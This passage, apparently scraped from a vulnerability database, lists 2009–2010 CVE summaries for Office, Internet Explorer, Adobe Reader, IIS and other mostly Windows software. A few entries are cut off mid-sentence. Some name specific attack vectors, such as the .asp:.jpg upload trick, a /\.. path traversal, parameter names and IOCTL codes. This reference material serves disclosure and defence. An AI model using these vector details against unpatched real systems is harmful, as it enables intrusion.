PR_ATTACH_METHOD property value of ATTACH_BY_REFERENCE, which allows user-assisted remote attackers to execute arbitrary code via a crafted message, aka "Microsoft Outlook SMB Attachment Vulnerability." [CVE-2010-0264] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability." [CVE-2010-0263] Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0262] Microsoft Office Excel 2007 SP1 and SP2 and Office 2004 for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers access of an uninitialized stack variable, aka "Microsoft Office Excel FNGROUPNAME Record Uninitialized Memory Vulnerability." [CVE-2010-0261] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted spreadsheet in which "a MDXSET record is broken up into several records," aka "Microsoft Office Excel MDXSET Record Heap Overflow Vulnerability." [CVE-2010-0260] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0258] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2010-0257] Microsoft Office Excel 2002 SP3 does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel Record Memory Corruption Vulnerability." [CVE-2010-0256] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly calculate unspecified indexes associated with Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Index Calculation Memory Corruption Vulnerability." [CVE-2010-0255] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not prevent rendering of non-HTML local files as HTML documents, which allows remote attackers to bypass intended access restrictions and read arbitrary files via vectors involving JavaScript exploit code that constructs a reference to a file://127.0.0.1 URL, aka the dynamic OBJECT tag vulnerability, as demonstrated by obtaining the data from an index.dat file, a variant of CVE-2009-1140 and related to CVE-2008-1448. [CVE-2010-0254] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Attribute Validation Memory Corruption Vulnerability." [CVE-2010-0248] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0247] Microsoft Internet Explorer 5.01 SP4, 6, and 6 SP1 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0246] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, and CVE-2010-0245. [CVE-2010-0245] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, and CVE-2010-0246. [CVE-2010-0244] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2530 and CVE-2009-2531. [CVE-2010-0243] Buffer overflow in MSO.DLL in Microsoft Office XP SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Office document, aka "MSO.DLL Buffer Overflow." [CVE-2010-0204] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0197, and CVE-2010-0201. [CVE-2010-0203] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0199, and CVE-2010-0202. [CVE-2010-0202] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0199, and CVE-2010-0203. [CVE-2010-0201] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0197, and CVE-2010-0204. [CVE-2010-0199] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0202, and CVE-2010-0203. [CVE-2010-0198] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0199, CVE-2010-0202, and CVE-2010-0203. [CVE-2010-0197] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0201, and CVE-2010-0204. [CVE-2010-0196] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0193. [CVE-2010-0195] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, do not properly handle fonts, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-0194] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0197, CVE-2010-0201, and CVE-2010-0204. [CVE-2010-0193] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0196. [CVE-2010-0192] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0193 and CVE-2010-0196. [CVE-2010-0191] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a "prefix protocol handler vulnerability." [CVE-2010-0190] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0161] The nsAuthSSPI::Unwrap function in extensions/auth/nsAuthSSPI.cpp in Mozilla Thunderbird before 2.0.0.24 and SeaMonkey before 1.1.19 on Windows Vista, Windows Server 2008 R2, and Windows 7 allows remote SMTP, IMAP, and POP servers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via crafted data in a session that uses SSPI. [CVE-2010-0138] Buffer overflow in Cisco CiscoWorks Internetwork Performance Monitor (IPM) 2.6 and earlier on Windows, as distributed in CiscoWorks LAN Management Solution (LMS), allows remote attackers to execute arbitrary code via a malformed getProcessName CORBA General Inter-ORB Protocol (GIOP) request, related to a "third-party component," aka Bug ID CSCsv62350. [CVE-2010-0120] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allows remote attackers to execute arbitrary code via large size values in QCP audio content. [CVE-2010-0117] RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows do not properly handle dimensions during YUV420 transformations, which might allow remote attackers to execute arbitrary code via crafted MP4 content. [CVE-2010-0116] Integer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows might allow remote attackers to execute arbitrary code via a crafted QCP file that triggers a heap-based buffer overflow. [CVE-2010-0103] UsbCharger.dll in the Energizer DUO USB battery charger software contains a backdoor that is implemented through the Arucer.dll file in the %WINDIR%\system32 directory, which allows remote attackers to download arbitrary programs onto a Windows PC, and execute these programs, via a request to TCP port 7777. [CVE-2010-0045] Apple Safari before 4.0.5 on Windows does not properly validate external URL schemes, which allows remote attackers to open local files and execute arbitrary code via a crafted HTML document. [CVE-2010-0043] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted TIFF image. [CVE-2010-0042] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows does not ensure that memory access is associated with initialized memory, which allows remote attackers to obtain potentially sensitive information from process memory via a crafted TIFF image. [CVE-2010-0041] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows does not ensure that memory access is associated with initialized memory, which allows remote attackers to obtain potentially sensitive information from process memory via a crafted BMP image. [CVE-2010-0040] Integer overflow in ColorSync in Apple Safari before 4.0.5 on Windows, and iTunes before 9.1, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an image with a crafted color profile that triggers a heap-based buffer overflow. [CVE-2010-0034] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Office PowerPoint Viewer TextCharsAtom Record Stack Overflow Vulnerability." [CVE-2010-0033] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Viewer TextBytesAtom Record Stack Overflow Vulnerability." [CVE-2010-0032] Use-after-free vulnerability in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "OEPlaceholderAtom Use After Free Vulnerability." [CVE-2010-0031] Array index error in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint OEPlaceholderAtom 'placementId' Invalid Array Indexing Vulnerability." [CVE-2010-0030] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint LinkedSlideAtom Heap Overflow Vulnerability." [CVE-2010-0029] Buffer overflow in Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint File Path Handling Buffer Overflow Vulnerability." [CVE-2009-5092] Cross-site scripting (XSS) vulnerability in the management interface in Microsoft FAST ESP 5.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4764] Adobe Reader 8.x and 9.x on Windows is able to execute EXE files that are embedded in a PDF document, which makes it easier for remote attackers to trick users into executing arbitrary code via a crafted document. [CVE-2009-4741] Unspecified vulnerability in the Extras Manager before 2.0.0.67 in Skype before 4.1.0.179 on Windows has unknown impact and attack vectors. [CVE-2009-4654] Stack-based buffer overflow in the dhost module in Novell eDirectory 8.8 SP5 for Windows allows remote authenticated users to execute arbitrary code via long sadminpwd and verifypwd parameters in a submit action to /dhost/httpstk. [CVE-2009-4653] Stack-based buffer overflow in the dhost module in Novell eDirectory 8.8 SP5 for Windows allows remote authenticated users to cause a denial of service (dhost.exe crash) and possibly execute arbitrary code via a long string to /dhost/modules?I:. [CVE-2009-4445] Microsoft Internet Information Services (IIS), when used in conjunction with unspecified third-party upload applications, allows remote attackers to create empty files with arbitrary extensions via a filename containing an initial extension followed by a : (colon) and a safe extension, as demonstrated by an upload of a .asp:.jpg file that results in creation of an empty .asp file, related to support for the NTFS Alternate Data Streams (ADS) filename syntax. NOTE: it could be argued that this is a vulnerability in the third-party product, not IIS, because the third-party product should be applying its extension restrictions to the portion of the filename before the colon. [CVE-2009-4444] Microsoft Internet Information Services (IIS) 5.x and 6.x uses only the portion of a filename before a [CVE-2009-4378] The IPMI dissector in Wireshark 1.2.0 through 1.2.4 on Windows allows remote attackers to cause a denial of service (crash) via a crafted packet, related to "formatting a date/time using strftime." [CVE-2009-4324] Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009. [CVE-2009-4186] Stack consumption vulnerability in Apple Safari 4.0.3 on Windows allows remote attackers to cause a denial of service (application crash) via a long URI value (aka url) in the Cascading Style Sheets (CSS) background property. [CVE-2009-4118] The StartServiceCtrlDispatcher function in the cvpnd service (cvpnd.exe) in Cisco VPN client for Windows before 5.0.06.0100 does not properly handle an ERROR_FAILED_SERVICE_CONTROLLER_CONNECT error, which allows local users to cause a denial of service (service crash and VPN connection loss) via a manual start of cvpnd.exe while the cvpnd service is running. [CVE-2009-4074] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to leverage the "response-changing mechanism" to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, related to the details of output encoding and improper modification of an HTML attribute, aka "XSS Filter Script Handling Vulnerability." [CVE-2009-4073] The printing functionality in Microsoft Internet Explorer 8 allows remote attackers to discover a local pathname, and possibly a local username, by reading the dc:title element of a PDF document that was generated from a local web page. [CVE-2009-3959] Integer overflow in the U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a malformed PDF document. [CVE-2009-3958] Multiple stack-based buffer overflows in the NOS Microsystems getPlus Helper ActiveX control before 1.6.2.49 in gp.ocx in the Download Manager in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow remote attackers to execute arbitrary code via unspecified initialization parameters. [CVE-2009-3957] Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to cause a denial of service (NULL pointer dereference) via unspecified vectors. [CVE-2009-3956] The default configuration of Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, does not enable the Enhanced Security feature, which has unspecified impact and attack vectors, related to a "script injection vulnerability," as demonstrated by Acrobat Forms Data Format (FDF) behavior that allows cross-site scripting (XSS) by user-assisted remote attackers. [CVE-2009-3955] Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted JPC_MS_RGN marker in the Jp2c stream of a JpxDecode encoded data stream, which triggers an integer sign extension that bypasses a sanity check, leading to memory corruption. [CVE-2009-3954] The 3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to execute arbitrary code via unspecified vectors, related to a "DLL-loading vulnerability." [CVE-2009-3953] The U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, 8.x before 8.2 on Windows and Mac OS X, and 7.x before 7.1.4 allows remote attackers to execute arbitrary code via malformed U3D data in a PDF document, related to a CLODProgressiveMeshDeclaration "array boundary issue," a different vulnerability than CVE-2009-2994. [CVE-2009-3951] Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player before 10.0.42.34 and Adobe AIR before 1.5.3 on Windows allows remote attackers to obtain the names of local files via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4820. [CVE-2009-3943] Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16711 allows remote attackers to cause a denial of service (application hang) via a JavaScript loop that configures the home page by using the setHomePage method and a DHTML behavior property. [CVE-2009-3936] Unspecified vulnerability in Citrix Online Plug-in for Windows 11.0.x before 11.0.150 and 11.x before 11.2, Online Plug-in for Mac before 11.0, Receiver for iPhone before 1.0.3, and ICA Java, Mac, UNIX, and Windows Clients for XenApp and XenDesktop allows remote attackers to impersonate the SSL/TLS server and bypass authentication via a crafted certificate, a different vulnerability than CVE-2009-3555. [CVE-2009-3902] Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL. [CVE-2009-3885] Sun Java SE 5.0 before Update 22 and 6 before Update 17 on Windows allows remote attackers to cause a denial of service via a BMP file containing a link to a UNC share pathname for an International Color Consortium (ICC) profile file, probably a related issue to CVE-2007-2789, aka Bug Id 6632445. [CVE-2009-3883] Multiple unspecified vulnerabilities in the Windows Pluggable Look and Feel (PL&F) feature in the Swing implementation in Sun Java SE 5.0 before Update 22 and 6 before Update 17, and OpenJDK, have unknown impact and remote attack vectors, related to "information leaks in mutable variables," aka Bug Id 6657138. [CVE-2009-3864] The Java Update functionality in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22 and JDK and JRE 6 before Update 17, when a non-English version of Windows is used, does not retrieve available new JRE versions, which allows remote attackers to leverage vulnerabilities in older releases of this software, aka Bug Id 6869694. [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload. [CVE-2009-3841] Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.5x, 7.5x, and 7.60 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors. [CVE-2009-3832] Opera before 10.01 on Windows does not prevent use of Web fonts in rendering the product's own user interface, which allows remote attackers to spoof the address field via a crafted web site. [CVE-2009-3830] The download functionality in Team Services in Microsoft Office SharePoint Server 2007 12.0.0.4518 and 12.0.0.6219 allows remote attackers to read ASP.NET source code via pathnames in the SourceUrl and Source parameters to _layouts/download.aspx. [CVE-2009-3746] XScreenSaver in Sun Solaris 10, when the accessibility feature is enabled, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, a different vulnerability than CVE-2009-1276 and CVE-2009-2711. [CVE-2009-3674] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671. [CVE-2009-3673] Microsoft Internet Explorer 7 and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-3672] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory that (1) were not properly initialized or (2) are deleted, which allows remote attackers to execute arbitrary code via vectors involving a call to the getElementsByTagName method for the STYLE tag name, selection of the single element in the returned list, and a change to the outerHTML property of this element, related to Cascading Style Sheets (CSS) and mshtml.dll, aka "HTML Object Memory Corruption Vulnerability." NOTE: some of these details are obtained from third party information. NOTE: this issue was originally assigned CVE-2009-4054, but Microsoft assigned a duplicate identifier of CVE-2009-3672. CVE consumers should use this identifier instead of CVE-2009-4054. [CVE-2009-3671] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3674. [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue. [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges. [CVE-2009-3532] Multiple SQL injection vulnerabilities in login.asp (aka the login screen) in LogRover 2.3 and 2.3.3 on Windows allow remote attackers to execute arbitrary SQL commands via the (1) uname and (2) pword parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-3524] Unspecified vulnerability in ashWsFtr.dll in avast! Home and Professional for Windows before 4.8.1356 has unknown impact and local attack vectors. [CVE-2009-3523] aavmKer4.sys in avast! Home and Professional for Windows before 4.8.1356 does not properly validate input to IOCTLs (1) 0xb2d6000c and (2) 0xb2d60034, which allows local users to gain privileges via IOCTL requests using crafted kernel addresses that trigger memory corruption, a different vulnerability than CVE-2008-1625. [CVE-2009-3522] Stack-based buffer overflow in aswMon2.sys in avast! Home and Professional for Windows 4.8.1351, and possibly other versions before 4.8.1356, allows local users to cause a denial of service (system crash) and possibly gain privileges via a crafted IOCTL request to IOCTL 0xb2c80018. [CVE-2009-3450] Multiple cross-site scripting (XSS) vulnerabilities in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allow remote attackers to inject arbitrary web script or HTML via parameters with names beginning with __ (underscore underscore) sequences, which are incompatible with an XSS protection mechanism provided by Microsoft ASP.NET. [CVE-2009-3384] Multiple unspecified vulnerabilities in WebKit in Apple Safari before 4.0.4 on Windows allow remote FTP servers to execute arbitrary code, cause a denial of service (application crash), or obtain sensitive information via a crafted directory listing in a reply. [CVE-2009-3344] Unspecified vulnerability in SAP Crystal Reports Server 2008 on Windows XP allows attackers to cause a denial of service (infinite loop) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.3 through 8.11. NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3275] Blocks/Common/Src/Configuration/Manageability/Adm/AdmContentBuilder.cs in Microsoft patterns & practices Enterprise Library (aka EntLib) allows context-dependent attackers to cause a denial of service (CPU consumption) via an input string composed of many \ (backslash) characters followed by a " (double quote), related to a certain regular expression, aka a "ReDoS" vulnerability. [CVE-2009-3270] Microsoft Internet Explorer 7 through 7.0.6000.16711 allows remote attackers to cause a denial of service (unusable browser) by calling the window.print function in a loop, aka a "printing DoS attack," possibly a related issue to CVE-2009-0821. [CVE-2009-3267] Microsoft Internet Explorer 6 through 6.0.2900.2180, and 7.0.6000.16711, allows remote attackers to cause a denial of service (CPU consumption) via an automatically submitted form containing a KEYGEN element, a related issue to CVE-2009-1828. [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/. [CVE-2009-3243] Unspecified vulnerability in the TLS dissector in Wireshark 1.2.0 and 1.2.1, when running on Windows, allows remote attackers to cause a denial of service (application crash) via unknown vectors related to TLS 1.2 conversations. [CVE-2009-3177] Unspecified vulnerability in Kaspersky Online Scanner 7.0 has unknown impact and attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.8, (1) "Kaspersky Online Antivirus Scanner 7.0 exploit (Linux)" and (2) "Kaspersky Online Antivirus Scanner 7.0 exploit (Windows)." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3135] Stack-based buffer overflow in Microsoft Office Word 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, Office Word Viewer 2003 SP3, and Office Word Viewer allow remote attackers to execute arbitrary code via a Word document with a malformed File Information Block (FIB) structure, aka "Microsoft Office Word File Information Memory Corruption Vulnerability." [CVE-2009-3134] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3133] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a spreadsheet containing a malformed object that triggers memory corruption, related to "loading Excel records," aka "Excel Document Parsing Memory Corruption Vulnerability." [CVE-2009-3132] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3131] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3130] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via a spreadsheet containing a malformed Binary File Format (aka BIFF) record that triggers memory corruption, aka "Excel Document Parsing Heap Overflow Vulnerability." [CVE-2009-3129] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3128] Microsoft Office Excel 2002 SP3 and 2003 SP3, and Office Excel Viewer 2003 SP3, does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a spreadsheet with a malformed record object, aka "Excel SxView Memory Corruption Vulnerability." [CVE-2009-3127] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, and Office Excel Viewer 2003 SP3 do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Cache Memory Corruption Vulnerability." [CVE-2009-3099] Unspecified vulnerability in HP OpenView Operations Manager 8.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2007-3872. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3098] Unspecified vulnerability in the Portal in HP Operations Dashboard 2.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3097] Multiple unspecified vulnerabilities in HP Performance Insight 5.3 on Windows allow attackers to obtain sensitive information via unknown vectors, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3096] Multiple unspecified vulnerabilities in HP Performance Insight 5.3 allow remote attackers to have an unknown impact, related to (1) a "Remote exploit" on Windows platforms, and (2) a "Remote preauthentication exploit" on the Windows Server 2003 SP2 platform, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3089] IBM Tivoli Directory Server (TDS) 6.0 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via unspecified vectors, related to (1) the ibmslapd.exe daemon on Windows and (2) the ibmdiradm daemon in the administration server on Linux, as demonstrated by certain modules in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2006-0717. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3087] Unspecified vulnerability in nserver.exe in the server in IBM Lotus Domino 8.0 on Windows Server 2003 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3032] Integer overflow in kvolefio.dll 8.5.0.8339 and 10.5.0.0 in the Autonomy KeyView Filter SDK, as used in IBM Lotus Notes 8.5, Symantec Mail Security for Microsoft Exchange 5.0.10 through 5.0.13, and other products, allows context-dependent attackers to execute arbitrary code via a crafted OLE document that triggers a heap-based buffer overflow. [CVE-2009-3023] Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability." [CVE-2009-3003] Microsoft Internet Explorer 6 through 8 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. [CVE-2009-2987] Unspecified vulnerability in an ActiveX control in Adobe Reader and Acrobat 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2 on Windows allows remote attackers to cause a denial of service via unknown vectors. [CVE-2009-2975] Mozilla Firefox 3.5.2 on Windows XP, in some situations possibly involving an incompletely configured protocol handler, does not properly implement setting the document.location property to a value specifying a protocol associated with an external application, which allows remote attackers to cause a denial of service (memory consumption) via 